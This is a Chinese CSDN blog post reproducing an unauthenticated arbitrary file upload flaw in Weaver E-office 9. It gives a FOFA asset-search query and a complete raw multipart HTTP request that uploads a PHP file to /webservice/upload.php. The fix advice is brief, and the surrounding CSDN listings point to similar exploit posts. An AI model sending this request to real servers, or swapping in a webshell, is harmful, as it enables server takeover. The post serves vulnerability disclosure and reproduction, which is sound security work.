泛微E-office9 action_upload.php任意文件上传漏洞

最新推荐文章于 2024-10-01 00:58:12 发布
最新推荐文章于 2024-10-01 00:58:12 发布
阅读量2k 收藏 10
点赞数 7
分类专栏: 漏洞复现 文章标签: php 开发语言 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36618918/article/details/135299433
版权

产品介绍

泛微E-office是⼀款针对中小型组织开发的轻量级OA产品,具有开箱即用、应用丰富、配置灵活的特点,能够满足日常办公审批、考勤、流程、知识文档、公文、人事、即时通讯等需求。同时,它支持私有云部署,确保数据安全可控,并可以在PC端、APP、企业微信、钉钉等多个平台上使用。

漏洞概述

泛微OA E-Office 在 action_upload.php 中上传文件过滤不严格导致允许无限制地上传文件,攻击者可以通过该漏洞直接获取网站权限

资产测绘

app=“泛微-EOffice”

漏洞复现

POST /webservice/upload.php HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 160
Content-Type: multipart/form-data; boundary=4f432185edc34d687901a1b9853fbb88

--4f432185edc34d687901a1b9853fbb88
Content-Disposition: form-data; name="file"; filename="a.php4"

<?php phpinfo();?>
--4f432185edc34d687901a1b9853fbb88--

在这里插入图片描述
访问上传路径:
在这里插入图片描述

修复建议

关闭互联网暴露面或接口访问限制
升级至安全版本

keepb1ue
关注
专栏目录
泛微E-Office任意文件上传漏洞复现
0xSec
08-12 2771
泛微E-Office是一款标准化的协同 OA 办公软件,泛微协同办公产品系列成员之一,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。泛微e-office 9.5版本源文件/webservice/upload.php接口处存在任意文件上传漏洞,未经身份验证的恶意攻击者可以上传恶意文件,从而获取目标服务器的控制权限。
泛微 e-office 10 schema_mysql.sql文件存在敏感信息泄露 附POC
nnn2188185的博客
08-15 336
泛微 e-office 10 schema_mysql.sql文件存在敏感信息泄露 附POC
通达OA v2017 action_upload.php 任意文件上传漏洞.md
09-07
通达OA漏洞合集
泛微云桥前台文件上传漏洞-202408
网络安全。
08-18 1201
静态分析代码流程:先看方法有没有声明,没有声明使用 jd-gui 反编译工具 search 搜索要跳转的类方法,定位到后再去 idea 里查看有无声明,再无声明可结合 jd-gui、jar-analyzer工具搜索查找。动态分析:每一步都可以打断点动态分析一下,可以随时在每一步骤中用到的方法进行断点分析。
漏洞复现】泛微E-Office uploadfile.php 任意文件上传漏洞
qq_34780861的博客
04-23 438
在/general/index/UploadFile.php中上传文件过滤不严格导致允许无限制地上传文件,攻击者可以通过该漏洞直接获取网站权限。
php 任意文件上传,任意文件上传漏洞
weixin_39765280的博客
03-28 276
就是记录下这次的ctf过程,总的来说,亮点不在题目,而是两道题的结合。题目分析按照出题的思路,大致就是要我们上传一些可执行的代码,然后找出服务器上的flag文件。因此,我们这次的题目就很简单了,只需要我们绕过上传限制,并且能访问到自己的上传的脚本就好了呀。尝试上传首先,我们访问ip地址是122的靶机,其界面如下:我们先尝试将自己写好的php脚本上传,看下服务器的返回提示:它提示我们只能上传jpg格...
泛微E-Office v9任意文件上传(CNVD-2021-49104)复现
weixin_46137328的博客
12-02 2953
0x00 漏洞概况泛微e-office是一款标准化的协同OA办公软件,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台...
任意文件上传漏洞(简介)
diaobusi的博客
08-22 709
文件上传是指将文件从本地计算机或其他设备上传到网络服务器或其他存储位置的过程。通过文件上传,您可以将文件(如图像、文档、音频或视频等)传输到网络上的不同位置,以实现文件共享、备份、存储或与他人共享内容等目的。用户选择要上传的文件:用户在自己的设备上选择要上传的文件,可能通过文件资源管理器、拖放文件或选择文件对话框等方式进行。文件被传输至服务器:一旦用户选择文件,通过网络将文件发送到特定的服务器。可以使用各种协议,如HTTP、FTP、SFTP等来实现文件传输。
泛微E-Office mobile_upload_save接口任意文件上传漏洞复现 [附POC]
薛定谔嘚喵博客
08-01 497
泛微e-office系统其mobile_upload_save接口存在任意文件上传漏洞,未经身份验证的远程攻击者可利用此漏洞上传任意文件,在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。
泛微e-office短信插件_泛微短信接口开发_e-office短信发送设置
02-11
泛微e-office短信插件设置指南 在泛微e-office V10.0版本中,设置短信发送功能需要通过泛微短信接口进行开发。下面将详细介绍泛微e-office短信插件的设置步骤和泛微短信接口的开发过程。 一、泛微e-office短信插件...
泛微E-office 10 schema_mysql接口敏感信息泄露漏洞复现 [附POC]
薛定谔嘚喵博客
08-09 712
泛微E-0fice10是一款企业级办公自动化系统,主要用于优化和管理企业的文档、信息流转、协作与沟通工作流程。其schema_mysql接口存在敏感信息泄露。
e-office 9.0 160125全版升级包
11-05
e-office 9.0 升级安装包,便于e-office 9.0更好的使用。更新内容详见官网说明。
eoffice9.0从头到尾全套视频教程
01-08
eoffice9.0从头到尾全套视频教程讲述了OA办公软件的实用性,讲述每个模块的功能的使用操作和设置。由于是视频文件比较大下载好后大家可以在提供的百度网盘内下载。
漏洞复现】泛微OA E-Office do_excel.php 任意文件写入漏洞
最新发布
alert['Hello World']
10-01 152
泛微OA E-Office do_excel.php 口存在任意文件写入漏洞。由于该接口未对上传文件的路径和名称进行有效校验,攻击者可以通过构造特定的请求,将任意文件写入到服务器的指定位置。攻击者利用该漏洞上传恶意文件,如 WebShell 或系统脚本,从而在服务器上执行任意命令,访问敏感数据,甚至完全接管服务器。此漏洞严重威胁系统安全,可导致数据泄露、权限提升以及业务系统瘫痪等严重后果。
通达OA前台action任意文件上传
xiaokp7的博客
08-02 764
通达OA是由北京通达信科科技有限公司自主研发的协同办公自动化系统,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等。action_upload.php 文件过滤不足且无需后台权限,导致任意文件上传漏洞
action upload.php,upload.php
weixin_31205717的博客
03-19 136
require_once('load.php');$yuming = str_replace(array('www','.',),'',$_SERVER["HTTP_HOST"]);if(!empty($yuming)) $yuming = $yuming.'/';$action= isset($_REQUEST['action']) ? trim($_REQUEST['action']) : "...
action upload.php,PHP第3款:上传图片upload.php?action=img
weixin_39929723的博客
03-19 141
一:简介我们有的时候,不爱总结,其实上传图片早几年前就会了。今天上传一个图片,突然不会了。认真想了一下,其实就应该分析一下,总结一下,以后自己就好用了。我这个方法,直接在 action 跟上 upload.php?action=img 就可以了,是不是很简单呢?二:插件作者及下载作者:hongweizhiyuan三:源代码1、HTML源代码2、PHP源代码/*** upload.php?acti...
泛微 e-cology9 filedownload.jsp 任意文件读取
11-24
泛微 e-cology9 是一款企业级办公自动化软件,然而它的 filedownload.jsp 存在任意文件读取漏洞。攻击者可以通过构造恶意的请求,访问该漏洞并读取系统中的任意文件,包括敏感信息如用户凭证、配置文件和数据库等...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值